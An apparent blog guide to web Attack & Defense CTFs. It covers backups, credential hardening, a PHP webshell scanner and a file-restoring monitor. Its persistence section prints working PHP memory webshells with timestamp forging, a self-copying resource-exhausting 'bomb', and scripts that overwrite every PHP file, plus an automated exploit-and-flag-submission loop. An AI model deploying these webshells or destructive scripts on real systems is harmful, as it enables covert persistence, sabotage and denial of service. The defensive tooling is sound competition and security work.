Attack & Defense Tips
TyeYeah Lv4

Attack & Defense CTFs are a less common kind of CTF with more moving parts. They are rarely run for the general public because of their complexity.
In an A&D (sometimes AWD) CTF, every team is given the same set of vulnerable server software. Teams set up and audit this software before the competition. At the start of the competition, teams connect their servers to an isolated network to join the CTF.
Within this network, teams launch attacks against each other's servers, hoping to exploit the vulnerabilities they have found. Likewise, teams need to patch their own software so that it is protected against these exploits while still functioning normally (a checker usually verifies that each service is up and behaves correctly).
Teams receive points for extracting flags, defending their own flags, and keeping their servers operating normally.

Preparation

This post is mainly about web A&D, so everything below is about protecting your own web application and breaking the others.

Backup

Right at the start, back up the source directory and the database, so that you can restore the server if it gets attacked through a vulnerability you have not found yet.

# backup files
# pack on gamebox
$ tar -zcvf web.tar.gz /var/www/html/
# download to host (keep a copy off the gamebox in case it gets wiped)
$ scp -r -P Port remote_username@remote_ip:remote_folder local_file

# dump mysql database (mysqldump can be run from any directory; do not write the dump into /var/lib/mysql)
$ mysqldump -u root -p your_db > your_db.sql
Enter password:
# dump all dbs
$ mysqldump -u root -p --all-databases > bak.sql

And to recover:

# recover mysql database (the database must already exist, unless the dump
# was made with --all-databases, which includes the CREATE DATABASE statements)
$ mysql -u root -p your_db < your_db.sql
# or
$ mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
...
mysql> create database your_db;
Query OK, 1 row affected (0.01 sec)
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| sys |
| your_db |
+--------------------+
5 rows in set (0.00 sec)

mysql> use your_db
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> source your_db.sql
Query OK, 0 rows affected (0.00 sec)
...

Secure

Then change the passwords for SSH, the database and the admin page of the site, and leave no backdoors or weak passwords behind (every team starts from the same image, so the default credentials are known to everyone).

# change ssh passwd
$ passwd
Changing password for xxx.
Current password:
New password:
Retype new password:

# change mysql passwd
$ mysqladmin -u[user_name] -p[old_passwd] password new_passwd
# or in mysql cli (MySQL 5.6 and older; SET PASSWORD ... = PASSWORD() was removed in 8.0)
mysql> set password for user_name@localhost = password('new_passwd');
# or edit table 'user' (MySQL 5.6 and older; 5.7 renamed the column to authentication_string)
mysql> use mysql;
mysql> update user set password=password('new_passwd') where user='user_name' and host='localhost';
mysql> flush privileges;
# in mysql 5.7 / 8.0
mysql> USE mysql
mysql> ALTER USER 'user_name'@'localhost' IDENTIFIED WITH mysql_native_password BY 'new_passwd';
# if the root password is unknown, start mysqld with --skip-grant-tables, reset it with the
# statements above, then restart without the option (while it is set, anyone can log in without a password)
# remember to put the new db password into the site's config file, or the service goes down

Easy ways to find backdoors (some tools are introduced below):

$ find . -name '*.php' | xargs grep -n 'eval('
$ find . -name '*.php' | xargs grep -n 'assert('
$ find . -name '*.php' | xargs grep -n 'system('
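The greps above only catch literal function names. A slightly smarter scanner, added here as an example (it is not one of the tools the post refers to), walks the web root and reports lines matching patterns typical for dropped webshells: dangerous calls fed straight from a superglobal, the preg_replace /e modifier, decoder functions, variable functions such as $f($_GET['cmd']) and split superglobal names like ${"_P"."OST"}. The pattern list and the sample tree in demo() are constructed for illustration; tune the list to the application, since frameworks legitimately call some of these functions.

```python
"""Scan a PHP tree for typical webshell / backdoor patterns.

Added example, not a tool from the original post. The patterns are a
starting point and the sample files are constructed.
"""
import os
import re
import tempfile

# Patterns common in dropped webshells and rare in normal application code.
PATTERNS = [
    ("eval", re.compile(r"\beval\s*\(", re.I)),
    ("assert", re.compile(r"\bassert\s*\(", re.I)),
    ("command-exec", re.compile(r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(", re.I)),
    ("preg_replace-e", re.compile(r"preg_replace\s*\(\s*['\"]/.*?/[a-z]*e[a-z]*['\"]", re.I)),
    ("decoder", re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)),
    ("variable-function", re.compile(r"\$[A-Za-z_]\w*\s*\(\s*@?\$_(GET|POST|REQUEST|COOKIE)\b")),
    ("superglobal-in-exec", re.compile(
        r"\b(eval|assert|system|exec|shell_exec|passthru|create_function)\s*\(\s*@?\$_(GET|POST|REQUEST|COOKIE)\b",
        re.I)),
    ("split-superglobal", re.compile(r"\$\{\s*['\"]_[A-Z]*['\"]\s*\.")),  # ${"_P"."OST"}
]
PHP_EXTS = (".php", ".phtml", ".php5", ".inc")


def scan_file(path):
    """Return [(line_no, pattern_name, line)] for every hit in one file."""
    hits = []
    try:
        with open(path, "r", encoding="utf-8", errors="replace") as fh:
            for no, line in enumerate(fh, 1):
                for name, rx in PATTERNS:
                    if rx.search(line):
                        hits.append((no, name, line.strip()[:120]))
    except OSError:
        pass
    return hits


def scan_tree(root):
    """Map relative path -> set of pattern names for every flagged PHP file under root."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(PHP_EXTS):
                continue
            full = os.path.join(dirpath, fn)
            hits = scan_file(full)
            if hits:
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                report[rel] = {name for _no, name, _line in hits}
    return report


# Constructed sample tree: two clean files and three backdoors of different styles.
SAMPLES = {
    "index.php": "<?php\nrequire_once 'lib.php';\necho htmlspecialchars($_GET['q'] ?? '');\n",
    "lib.php": "<?php\nfunction sanitize($s) { return trim($s); }\n",
    "uploads/c.php": "<?php eval($_POST['c']);?>",
    "img/.cache.php": "<?php $f = base64_decode('c3lzdGVt'); $f($_GET['cmd']);",
    "admin/old.php": "<?php echo preg_replace('/(.*)/e', '$1', $_GET['p']);",
}


def demo():
    """Write the constructed tree to a temp dir and scan it."""
    root = tempfile.mkdtemp(prefix="phpscan_")
    for rel, body in SAMPLES.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return scan_tree(root)


if __name__ == "__main__":
    for rel, names in sorted(demo().items()):
        print("%s: %s" % (rel, ", ".join(sorted(names))))
```

Point scan_tree() at /var/www/html and compare the output against the same scan of your clean backup: anything that shows up only on the live box was planted after the start.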

Make sure that only the service ports are open and everything else is closed (netstat, ss, kill), and that the permissions on key files are under control (lsattr, chattr).
Visit Linux Security Response for detailed commands.

Attack (Control)

Web A&D is like a tiny but fierce pentest.

Code Audit

This is the basic way to attack. Normally we use off-the-shelf scanners to find the deliberately planted backdoors and to identify vulnerabilities quickly; since every team runs the same code, a vulnerability found in your own copy works against all the others.

Persistence

After taking over a target, we have to make the access persistent. Here are some methods.

  1. Reverse shell

To manage shells: Reverse-Shell-Manager
Other shell collections, like webshell and php-webshells, are all on GitHub.

  2. Memory webshell

It is a PHP script that deletes itself from disk but keeps running inside the PHP worker process, rewriting a webshell file all the time. Here are some examples:

<?php
ignore_user_abort(true); // keep running after the client disconnects
set_time_limit(0);       // no execution time limit
unlink(__FILE__);        // delete this file; the loop below lives on in memory
$file = 'write.php';     // webshell file name
// the hash is md5('pass'): the shell only runs when ?pass=pass is given
$code = '<?php if(md5($_GET["pass"])=="1a1dc91c907325c69271ddf0c944bc72"){@eval($_POST["a"]);} ?>';
// use it as write.php?pass=pass with POST data a=<php code>
while (1){
    file_put_contents($file,$code); // (re)write the webshell
    system('touch -m -d "2020-11-20 19:05:30" write.php'); // fake the modification time so it does not stand out in ls -lt
    usleep(5000);
}
?>

A better version only rewrites the file when its content has been changed (for example when a defender comments out the shell), which makes far less noise:

<?php
ignore_user_abort(true);
set_time_limit(0);
$file = 'c.php';
$code = base64_decode('PD9waHAgZXZhbCgkX1BPU1RbY10pOz8+'); // <?php eval($_POST[c]);?>
while(true) {
    // only touch the file when it is missing or has been tampered with,
    // e.g. a defender commented out the original code
    if(md5(@file_get_contents($file))!==md5($code)) {
        file_put_contents($file, $code);
    }
    usleep(50);
}
?>

Or you can bomb the server: the script below copies itself under random names without end and keeps requesting the site. It is destructive and also hurts the target's availability, so think before using it:

<?php
set_time_limit(0);
ignore_user_abort(true);
function randstr(){ return bin2hex(random_bytes(8)); } // random file name
while(1){
    file_put_contents(randstr().'.php',file_get_contents(__FILE__)); // copy itself under a new name
    file_get_contents("http://127.0.0.1/"); // keep the web server busy
}
?>

To delete them:

<?php
set_time_limit(0);
ignore_user_abort(1);
// remove every .php file in the directory (adjust the pattern to the dropped names)
array_map('unlink', glob("some/dir/*.php"));
?>

Or to overwrite them (this walks the whole tree below the script's directory):

<?php
set_time_limit(0);
ignore_user_abort(1);
unlink(__FILE__);
function getfiles($path){
    foreach(glob($path.'/*') as $afile){
        if(is_dir($afile))
            getfiles($afile);                        // recurse into subdirectories
        elseif(substr($afile,-4)==='.php')
            @file_put_contents($afile,"#Anything#"); // overwrite every php file
            //unlink($afile);
    }
}
while(1){
    getfiles(__DIR__);
    sleep(10);
}
?>

For a worm-style PHP webshell, see awd_worm_phpwebshell_framework (in Chinese).

  3. Apache Thread Injection

A faster way than a PHP memory webshell. A Linux C memory shell is faster still, for sure.

Defence

Besides the hardening mentioned in Preparation, we can use some off-the-shelf scripts to help with defence.

Traffic & File Monitor

Some of my collection: filemon.py, logger.php, logger1.php, logger2.php, waf.php, waf1.php.
Write require_once('xxx.php'); into the page you want to protect, preferably a file that is required by many other pages (a config or common include), so that one line covers the whole site. If you control php.ini or .htaccess, auto_prepend_file does the same for every script without touching the source.

Kill Memory Webshell

Use kill -9 -1 to kill every process of the current user, which includes the memory webshell process (never run it as root: as root it kills every process on the box). It also kills the legitimate worker processes of that user, so restart the web service afterwards; restarting php-fpm or Apache is in fact the straightforward way to end a loop that lives inside a worker, since ignore_user_abort keeps it alive only as long as the worker does.
Or refer to the Persistence part and fight it with the same methods (delete the dropped files constantly).
Create a directory, or keep writing an empty file, with the same name as the memory webshell's output file, so that it can no longer be generated.

Searching for these keywords turns up many more results.

Sometimes we meet file names that the shell or rm misinterprets.
A name cannot actually contain /, so a "file" like /abc is a path at the filesystem root; rm '/abc' removes exactly that path.
A name starting with -, like -abc, is treated as an option; add -- in front, like rm -- -abc, or use rm ./-abc. Names containing spaces or shell metacharacters should be quoted, like rm './a b.php'.
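A minimal version of the file-monitor idea from Traffic & File Monitor combined with the "delete them constantly" and "occupy the file name" tactics from Kill Memory Webshell, written in Python as an added example (it is not the post's filemon.py). Every pass compares the live web root against the clean backup taken in Preparation: tampered or deleted files are restored from the backup, unknown files are moved to a quarantine directory rather than deleted, and block_name() replaces a memory webshell's output file with a directory so its file_put_contents() keeps failing. The directory names, the sample site and the simulated attacker actions in demo() are constructed; the ignore prefixes are an assumption about where the application legitimately writes.

```python
"""Minimal file monitor for an A&D web root.

Added example, not the post's filemon.py. Restores tampered files from a clean
backup, quarantines dropped files, and blocks a memory webshell's output name
with a directory. All paths below are constructed.
"""
import hashlib
import os
import shutil
import tempfile
import time


def _digest(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root, ignore=()):
    """relative path -> sha256 for every regular file under root (symlinks skipped)."""
    out = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            full = os.path.join(dirpath, fn)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if os.path.islink(full) or rel.startswith(ignore):
                continue
            out[rel] = _digest(full)
    return out


def check_once(webroot, backup, quarantine, ignore=("uploads/",)):
    """One pass: bring webroot back to the backup baseline.
    ignore: prefixes the application legitimately writes to (assumed: uploads/),
    left alone so the checker's own writes are not undone."""
    report = {"restored": [], "quarantined": []}
    baseline = snapshot(backup, ignore)
    live = snapshot(webroot, ignore)
    # modified or deleted known files: copy the clean version back
    for rel, good in baseline.items():
        if live.get(rel) != good:
            dst = os.path.join(webroot, rel)
            if os.path.isdir(dst):              # the path was turned into a directory
                shutil.rmtree(dst)
            os.makedirs(os.path.dirname(dst), exist_ok=True)
            shutil.copy2(os.path.join(backup, rel), dst)
            report["restored"].append(rel)
    # unknown files: move out for analysis instead of deleting the evidence
    for rel in live:
        if rel not in baseline:
            dst = os.path.join(quarantine, "%d_%s" % (int(time.time()), rel.replace("/", "_")))
            shutil.move(os.path.join(webroot, rel), dst)
            report["quarantined"].append(rel)
    return report


def block_name(webroot, rel):
    """Occupy the path a memory webshell keeps writing: with a directory in the
    way its file_put_contents() fails and nothing is served from that name."""
    target = os.path.join(webroot, rel)
    if os.path.isfile(target):
        os.remove(target)
    os.makedirs(target, exist_ok=True)
    return os.path.isdir(target)


def watch(webroot, backup, quarantine, interval=1.0):
    """Run forever and print what each pass undid."""
    while True:
        rep = check_once(webroot, backup, quarantine)
        if rep["restored"] or rep["quarantined"]:
            print(time.strftime("%H:%M:%S"), rep)
        time.sleep(interval)


def demo():
    """Constructed site plus simulated attacker activity, then one monitor pass."""
    base = tempfile.mkdtemp(prefix="awd_")
    webroot, backup, quarantine = (os.path.join(base, d) for d in ("html", "backup", "quarantine"))
    os.makedirs(quarantine)
    clean = {"index.php": "<?php echo 'hello';", "inc/db.php": "<?php $dsn = 'mysql:host=localhost';"}
    for root in (webroot, backup):
        for rel, body in clean.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w") as fh:
                fh.write(body)
    with open(os.path.join(webroot, "index.php"), "a") as fh:
        fh.write("<?php @eval($_POST['a']);")           # backdoor appended to a real page
    with open(os.path.join(webroot, "c.php"), "w") as fh:
        fh.write("<?php eval($_POST[c]);?>")             # output of a memory webshell
    os.remove(os.path.join(webroot, "inc", "db.php"))    # sabotage
    report = check_once(webroot, backup, quarantine)
    report["blocked"] = block_name(webroot, "c.php")
    report["index_clean"] = _digest(os.path.join(webroot, "index.php")) == _digest(os.path.join(backup, "index.php"))
    return report


if __name__ == "__main__":
    print(demo())
```

Run watch() against a backup you have verified is clean, keep the interval short (the memory webshell loops in milliseconds) and extend ignore with every directory the checker writes to, or the monitor keeps undoing legitimate work.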

White List Control

For Apache this is .htaccess, for Nginx it is nginx.conf; write an allow-list there (for example only the checker's and your own addresses may reach the admin pages, and only the intended paths are served) for tighter access control. Be careful not to lock out the checker, or the service counts as down.

Other Tools & Scripts

Actually many GitHub repos like AWD-Predator-Framework, Prepare-for-AWD, AoiAWD and CTFDefense are about attack with defence (in Chinese), covering WAF building and automatic flag submission.
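An illustration of the automatic flag submission part, as an added Python example rather than code from any of the repositories above. run_round() drives every exploit against every team each round, pulls flags out of the responses, submits each one once and records targets that are down or patched without aborting the round. The flag format, the team addresses, the /flag path read through the c.php webshell from the Persistence section, and the fake transport and submitter in demo() are all constructed; http_post() is the real transport to plug in, and the real submitter depends on the platform's API.

```python
"""Round-driven attack loop with flag submission for web A&D.

Added example; not code from any repository named in the post. Flag format,
team addresses, webshell path and the fake transport in demo() are constructed.
Flags usually rotate every round, so call run_round() once per round with a
fresh `seen` set.
"""
import re
from urllib.parse import urlencode
from urllib.request import urlopen

FLAG_RE = re.compile(r"flag\{[0-9a-f]{32}\}")   # assumed flag format


def http_post(url, fields, timeout=5):
    """Real transport: POST form fields and return the response body."""
    with urlopen(url, data=urlencode(fields).encode(), timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


def make_webshell_exploit(post, path="/c.php", param="c"):
    """Exploit through the webshell left by the memory-webshell loop:
    POST <param>=<php code> and return whatever the page prints."""
    code = "echo file_get_contents('/flag');"       # assumed flag location
    def webshell(host):
        return post("http://%s%s" % (host, path), {param: code})
    webshell.__name__ = "webshell_" + path.strip("/").replace(".", "_")
    return webshell


def run_round(targets, exploits, submit, seen=None):
    """Run every exploit against every target and submit each new flag once.
    submit(flag) -> True if the platform accepted it. Exceptions from an
    exploit (host down, patched, WAF) are recorded and never abort the round."""
    seen = set() if seen is None else seen
    report = {"submitted": [], "rejected": [], "errors": []}
    for host in targets:
        for exploit in exploits:
            try:
                body = exploit(host) or ""
            except Exception as exc:
                report["errors"].append((host, exploit.__name__, str(exc)))
                continue
            for flag in FLAG_RE.findall(body):
                if flag in seen:
                    continue
                seen.add(flag)
                bucket = "submitted" if submit(flag) else "rejected"
                report[bucket].append((host, flag))
    return report


def demo():
    """Three constructed teams: one still has the shell, one is down, one patched."""
    good_flag = "flag{" + "0123456789abcdef" * 2 + "}"

    def fake_post(url, fields, timeout=5):
        if url.startswith("http://10.0.1.2/"):
            return "<pre>%s\n</pre>" % good_flag
        if url.startswith("http://10.0.1.3/"):
            raise OSError("connection refused")
        return "<h1>404 Not Found</h1>"             # team .4 removed c.php

    def fake_submit(flag):
        return flag == good_flag

    exploits = [make_webshell_exploit(fake_post)]
    return run_round(["10.0.1.2", "10.0.1.3", "10.0.1.4"], exploits, fake_submit)


if __name__ == "__main__":
    print(demo())
```

In a real round, pass http_post to make_webshell_exploit, add one exploit per vulnerability you found during the audit, and log the errors list: a host that suddenly starts failing has patched, so that exploit is burned and you need the next one.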

awd-platform is an interesting project for setting up your own AWD environment (web challenges only).
